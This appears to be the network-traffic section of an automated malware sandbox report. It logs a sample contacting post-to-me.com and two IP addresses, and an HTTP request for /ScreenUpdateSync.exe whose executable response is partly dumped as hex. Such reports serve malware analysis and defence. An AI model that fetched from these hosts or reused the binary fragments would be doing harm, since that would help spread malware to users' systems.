                                                    Nov 26, 2024 22:47:12.452500105 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.452574968 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.452614069 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.455818892 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.455857038 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.455909967 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.455955029 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.459103107 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.459146976 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.459276915 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.459330082 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.462439060 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.462486029 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.462544918 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.462579966 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.465768099 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.465809107 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.465933084 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.465976000 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.469096899 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.469144106 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.469223022 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.469265938 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.472417116 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.472457886 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.472533941 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.472573996 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.475790024 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.475835085 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.475894928 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.475934029 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.479070902 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.479116917 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.479195118 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.479243040 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.482450008 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.482492924 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.482556105 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.482592106 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.485696077 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.485739946 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.485800028 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.485837936 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.489377975 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.489423037 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.489494085 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.489532948 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.492854118 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.492897987 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.492980957 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.493026018 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.496689081 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.496706963 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.496730089 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.496742964 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.498944998 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.498986959 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.572770119 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.572871923 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.572940111 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.572988987 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.574166059 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.574251890 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.574331045 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.574373960 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.576735973 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.576792955 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.577739954 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.577796936 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.577862024 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.577908993 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.580409050 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.580451965 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.580529928 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.580574036 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.583096027 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.583153963 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.583184004 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.583228111 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.585702896 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.585750103 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.585807085 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.585846901 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.588231087 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.588279963 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.588372946 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.588413954 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.590732098 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.590780020 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.590848923 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.590888977 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.593233109 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.593280077 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.593331099 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.593370914 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.595706940 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.595778942 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.595809937 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.595845938 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.598189116 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.598242044 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.598351955 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.598393917 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.600430012 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.600478888 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.600552082 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.600593090 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.602771997 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.602817059 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.602854967 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.602895021 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.605098963 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.605145931 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.605175018 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.605211973 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.607384920 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.607439995 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.607476950 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.607517958 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.609566927 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.609616041 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.609679937 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.609720945 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.611833096 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.611879110 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.611937046 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.611979961 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.614020109 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.614062071 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.614187956 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.614224911 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.616194010 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.616240025 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.616271973 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.616316080 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.618357897 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.618401051 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.618486881 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.618527889 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.620501995 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.620544910 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.620629072 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.620671034 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.622636080 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.622683048 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.622742891 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.622783899 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.624748945 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.624819994 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.624849081 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.624890089 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.626874924 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.626923084 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.626955032 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.626993895 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.628990889 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.629036903 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.629091024 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.629129887 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.631097078 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.631145000 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.631186008 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.631227016 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.633220911 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.633276939 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.633316994 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.633358955 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.635327101 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.635380983 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.635411978 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.635456085 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.637458086 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.637506962 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.637569904 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.637609959 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.639631033 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.639676094 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.639729977 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.639769077 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.641678095 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.641726971 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.641789913 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.641834021 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.643800974 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.643843889 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.643901110 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.643943071 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.645930052 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.645976067 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.646044016 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.646085024 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.648049116 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.648096085 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.648149967 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.648190022 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.650142908 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.650191069 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.650302887 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.650345087 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.652242899 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.652292013 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.652460098 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.652502060 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.654347897 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.654391050 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.654453993 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.654498100 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.656481028 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.656528950 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.656558990 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.656599998 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.658601046 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.658643007 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.658668041 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.658711910 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.660681009 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.660726070 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.660787106 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.660826921 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.662810087 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.662856102 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.662949085 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.662991047 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.664928913 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.664977074 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.665009975 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.665045023 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.666997910 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.667049885 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.667099953 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.667145014 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:17.061640978 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:17.061717033 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:27.464905024 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:27.585026979 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:27.585119009 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:27.585395098 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:27.705252886 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:28.971765995 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:28.972518921 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:28.978765965 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:29.098706961 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:29.433871984 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:29.434016943 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:34.439394951 CET804973892.255.57.88192.168.2.4
                                                    Nov 26, 2024 22:47:34.439479113 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:47:58.544413090 CET4973880192.168.2.492.255.57.88
                                                    Nov 26, 2024 22:48:57.934643984 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:48:58.246638060 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:48:58.855804920 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:49:00.058859110 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:49:02.621380091 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:49:07.433830976 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:49:17.084469080 CET4973180192.168.2.4176.113.115.37

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 26, 2024 22:47:07.973640919 CET5498053192.168.2.41.1.1.1
                                                    Nov 26, 2024 22:47:08.155407906 CET53549801.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 26, 2024 22:47:07.973640919 CET192.168.2.41.1.1.10x38eStandard query (0)post-to-me.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 26, 2024 22:47:08.155407906 CET1.1.1.1192.168.2.40x38eNo error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                    Nov 26, 2024 22:47:08.155407906 CET1.1.1.1192.168.2.40x38eNo error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • post-to-me.com
                                                    • 176.113.115.37
                                                    • 92.255.57.88

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449731176.113.115.37807356C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 26, 2024 22:47:10.468208075 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                    User-Agent: ShareScreen
                                                    Host: 176.113.115.37
                                                    Nov 26, 2024 22:47:11.804481030 CET1236INHTTP/1.1 200 OK
                                                    Date: Tue, 26 Nov 2024 21:47:11 GMT
                                                    Server: Apache/2.4.41 (Ubuntu)
                                                    Last-Modified: Tue, 26 Nov 2024 21:45:02 GMT
                                                    ETag: "45e00-627d7c2f13cde"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 286208
                                                    Content-Type: application/x-msdos-program
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec 1a 10 d8 a8 7b 7e 8b a8 7b 7e 8b a8 7b 7e 8b 15 34 e8 8b aa 7b 7e 8b b6 29 fa 8b b5 7b 7e 8b b6 29 eb 8b b2 7b 7e 8b b6 29 fd 8b de 7b 7e 8b 8f bd 05 8b af 7b 7e 8b a8 7b 7f 8b d3 7b 7e 8b b6 29 f4 8b a9 7b 7e 8b b6 29 ea 8b a9 7b 7e 8b b6 29 ef 8b a9 7b 7e 8b 52 69 63 68 a8 7b 7e 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 90 09 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 26 03 00 00 64 65 02 00 00 00 00 06 19 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 68 02 00 04 00 00 e3 e4 04 00 02 00 00 80 00 00 [TRUNCATED]
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.${~{~{~4{~){~){~){~{~{{~){~){~){~Rich{~PELf&de@@phYPg@.text[%& `.rdataP#@$*@@.datacpN@.xuxozHI`g>j@.rsrcg@@
                                                    Nov 26, 2024 22:47:11.804673910 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 08 70 43 00 75 02 f3 c3 e9 01 09 00 00 6a 0c 68 c0 55 43 00 e8 29 17 00 00 8b 75 08 85 f6 74 75 83 3d c0 52 a7 02 03 75
                                                    Data Ascii: ;pCujhUC)utu=RuCjYeVCYEtVPdYYE}u7ujYVj5$C@CuT@CPYUQeVEPuuu
                                                    Nov 26, 2024 22:47:11.804780960 CET1236INData Raw: f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 8e 09 00 00 85 c0 74 0a e8 85 09 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 6a 0c 68 e0 55 43 00 e8 5b 16 00 00 83 65 e4 00 8b 75 08 3b 35 b0 52 a7 02 77 22 6a 04 e8 4e 0b 00 00 59 83 65 fc 00 56 e8 55 13 00 00
                                                    Data Ascii: u9EttM^jhUC[eu;5Rw"jNYeVUYEEEgjIYUVuSW=@C=$CujhFYYRut3@PuVSYuuFVj5$Cu.
                                                    Nov 26, 2024 22:47:11.804914951 CET1236INData Raw: 00 6a 02 6a 00 ff 15 d8 52 a7 02 33 c0 5d c3 6a 18 68 20 56 43 00 e8 9d 11 00 00 6a 08 e8 9f 06 00 00 59 83 65 fc 00 33 db 43 39 1d f0 8a 43 00 0f 84 c5 00 00 00 89 1d ec 8a 43 00 8a 45 10 a2 e8 8a 43 00 83 7d 0c 00 0f 85 9d 00 00 00 ff 35 d0 52
                                                    Data Ascii: jjR3]jh VCjYe3C9CCEC}5R"Y}tx5R"Yu}uu;rW"9t;rJ6""5R"5Ry"9}u9Et}}Eu}hACAC_YhACA
                                                    Nov 26, 2024 22:47:11.804924965 CET1236INData Raw: 06 b8 78 71 43 00 c3 83 c0 08 c3 e8 23 20 00 00 85 c0 75 06 b8 7c 71 43 00 c3 83 c0 0c c3 8b ff 55 8b ec 56 e8 e2 ff ff ff 8b 4d 08 51 89 08 e8 82 ff ff ff 59 8b f0 e8 bc ff ff ff 89 30 5e 5d c3 8b ff 55 8b ec 33 c0 39 45 08 6a 00 0f 94 c0 68 00
                                                    Data Ascii: xqC# u|qCUVMQY0^]U39EjhP@C$Cu]3@R]VW3(C<qCuqC8h0)YYtF$|3@_^$qC3S@CVqCW>t~tWW&YrC|q
                                                    Nov 26, 2024 22:47:11.804934978 CET1236INData Raw: 43 00 8b 48 10 80 79 43 00 75 09 83 60 04 fe a1 78 8f 43 00 83 78 08 ff 75 65 53 6a 00 ff 70 0c ff d6 a1 78 8f 43 00 ff 70 10 6a 00 ff 35 24 8e 43 00 ff 15 ac 40 43 00 8b 0d a8 52 a7 02 a1 78 8f 43 00 6b c9 14 8b 15 ac 52 a7 02 2b c8 8d 4c 11 ec
                                                    Data Ascii: CHyCu`xCxueSjpxCpj5$C@CRxCkR+LQHQP/,ER;xCvmRRExC=R[_^RV5RW3;u4kP5RW5$C@C;u3xR5RRk5RhAj5$C@
                                                    Nov 26, 2024 22:47:11.805618048 CET1236INData Raw: 1c 80 7d 0f 00 75 0e 8b ce bf 00 00 00 80 d3 ef 8b 4d 08 09 39 8d 44 90 44 8b ce eb 20 80 7d 0f 00 75 10 8d 4e e0 bf 00 00 00 80 d3 ef 8b 4d 08 09 79 04 8d 84 90 c4 00 00 00 8d 4e e0 ba 00 00 00 80 d3 ea 09 10 8b 45 10 89 03 89 44 18 fc 33 c0 40
                                                    Data Ascii: }uM9DD }uNMyNED3@_^[URMkRMSI VW}M3URS;#U#u];r;uRS;#U#u];r;u[{u
